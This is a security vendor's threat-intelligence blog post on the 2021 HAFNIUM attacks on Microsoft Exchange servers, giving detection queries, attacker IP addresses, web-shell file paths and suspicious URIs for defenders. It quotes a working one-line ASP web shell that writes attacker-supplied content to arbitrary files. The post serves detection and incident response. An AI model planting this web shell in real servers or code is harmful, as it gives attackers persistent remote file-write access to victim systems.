The cloud-native platform for centralized log management
Analytics, visualizations, and workflows purpose built for practitioners
Leading firms gaining more value from their machine data
Any source, any velocity – centralize logs, metrics, and traces for full visibility.
Close the gap between detection and response with an analyst-focused, cloud-native approach.
Understand complex environments with visual analysis and KPIs that matter most.
The most recent articles & research from Devo
On March 2, 2021, Microsoft announced it had detected the use of multiple 0-day exploits in limited and targeted attacks of on-premises versions of Microsoft Exchange Server. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign—with high confidence—to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.
This post provides details about the attacks and valuable information compiled by the entire Devo security team. For Devo Security Operations customers, all of the alerts shown in this post and all indicators are available in the SecOps application.
In the observed attacks, threat actors leveraged CVE-2021-26855 to send arbitrary HTTP requests and authenticate to an Exchange server. Additional vulnerabilities—CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065—exploit on-premises Exchange servers, giving attackers access to email accounts and allowing installation of additional malware to facilitate long-term access to victim environments.
After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised servers. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. Here’s an example of a web shell deployed by HAFNIUM, written in ASP:
<%@ Page Language="Jscript"%><%System.IO.File.WriteAllText(Request.Item["p"],Request.Item["c"]);%>
Following web shell deployment, HAFNIUM operators performed the following post-exploitation activity:
HAFNIUM operators also were able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.
Online versions of Microsoft Exchange have not been affected by these attacks. Here are the systems that have been hit:
Devo creates and maintains a lookup available to all domains. It contains all IOCs collected from multiple sources. msfhafnium0day contains hashes, IP addresses, and filenames.
Lookup example of use:
select `lu/msfhafnium0day/threat`(resource) as dmsfhafnium0day
group every 5m by srcIp, url
every 5m
select str(srcIp) as entity_sourceIP
select `lu/SecOpsAssetRole/class`(entity_sourceIP) as AssetRole // Get asset role from SecOpsRole Lookup
//<filtering_section>
select peek(url, re(“[^/]+$”), 0) as resource
where isnotnull(resource)
select `lu/msfhafnium0day/threat`(resource) as listedmsfhafnium0day
where isnotnull(listedmsfhafnium0day)
select mm2asn(srcIp) as enrichStream_entity_sourceIP_ASN
select mmisp(srcIp) as enrichStream_entity_sourceIP_ISP
select mmcountry(srcIp) as enrichStream_entity_sourceIP_country
select ifthenelse(enrichStream_entity_sourceIP_country = “A1”, true, false) as enrichStream_entity_sourceIP_isAnonymousProxy
select `lu/mispIndicator/category`(entity_sourceIP) as indicator
select `lu/mispIndicator/type`(entity_sourceIP) as misp_indicator_type
select `lu/mispIndicator/event_id`(entity_sourceIP) as misp_indicator_event_id
select `lu/SecOpsLocation/country`(entity_sourceIP) as enrichStream_entity_sourceIP_locationCountry
select `lu/SecOpsLocation/city`(entity_sourceIP) as enrichStream_entity_sourceIP_locationCity
select `lu/SecOpsLocation/state`(entity_sourceIP) as enrichStream_entity_sourceIP_locationState
select `lu/SecOpsLocation/lat`(entity_sourceIP) as enrichStream_entity_sourceIP_locationLat
select `lu/SecOpsLocation/lon`(entity_sourceIP) as enrichStream_entity_sourceIP_locationLon
select “Detection” as alertType
select “Persistence” as alertMitreTactics
select “Server Software Component: Web Shell” as alertMitreTechniques
select 4 as alertPriority
103.77.192.219
192.81.208.169
104.140.114.110
203.160.69.66
104.250.191.110
211.56.98.146
108.61.246.56
5.254.43.18
149.28.14.163
80.92.205.81
157.230.221.198
5.2.69.14
167.99.168.251
185.250.151.72
91.192.103.43
165.232.154.116
Alerts (Initial Access)
Based on the alert shipped by Azure Sentinel we can detect suspicious activity in Windows logs.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml
/owa/auth/Current/themes/resources/logon.css
/owa/auth/Current/themes/resources/owafont_ja.css
/owa/auth/Current/themes/resources/lgnbotl.gif
/owa/auth/Current/themes/resources/owafont_ko.css
/owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
/owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf
/owa/auth/Current/
/ecp/default.flt
/ecp/main.css
Following is a list of actions that server administrators can perform:
[1] https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
[2] https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/
[3] https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
[4] https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/
[5] https://gist.github.com/JohnHammond/0b4a45cad4f4ed3324939d72dc599883
[6] https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
[7] https://us-cert.cisa.gov/ncas/alerts/aa21-062a
[8] https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
[9] https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html
Web shell Detection resource: https://github.com/nsacyber/Mitigating-Web-Shells/blob/master/anomolous_uris.splunk.txt
C:\inetpub\wwwroot\aspnet_client\shell.aspx
C:\inetpub\wwwroot\aspnet_client\shellex.aspx
C:\inetpub\wwwroot\aspnet_client\errorcheck.aspx
C:\inetpub\wwwroot\aspnet_client\t.aspx
C:\inetpub\wwwroot\aspnet_client\discover.aspx
C:\inetpub\wwwroot\aspnet_client\aspnettest.aspx
C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx
C:\inetpub\wwwroot\aspnet_client\system_web
C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx
C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx
\inetpub\wwwroot\aspnet_client\ (any .aspx file under this folder or sub folders)
\<exchange install path>\FrontEnd\HttpProxy\ecp\auth\ (any file besides TimeoutLogoff.aspx)
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\ (any file or modified file that is not part of a standard install)
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\<any aspx file in this folder or subfolders>
\<exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\<any aspx file in this folder or subfolders>
Powershell cmdlet from RCE
S:CMD=Set-OabVirtualDirectory.ExternalUrl=’
By Fran Gomez
Sign up to stay informed with the latest updates from Devo.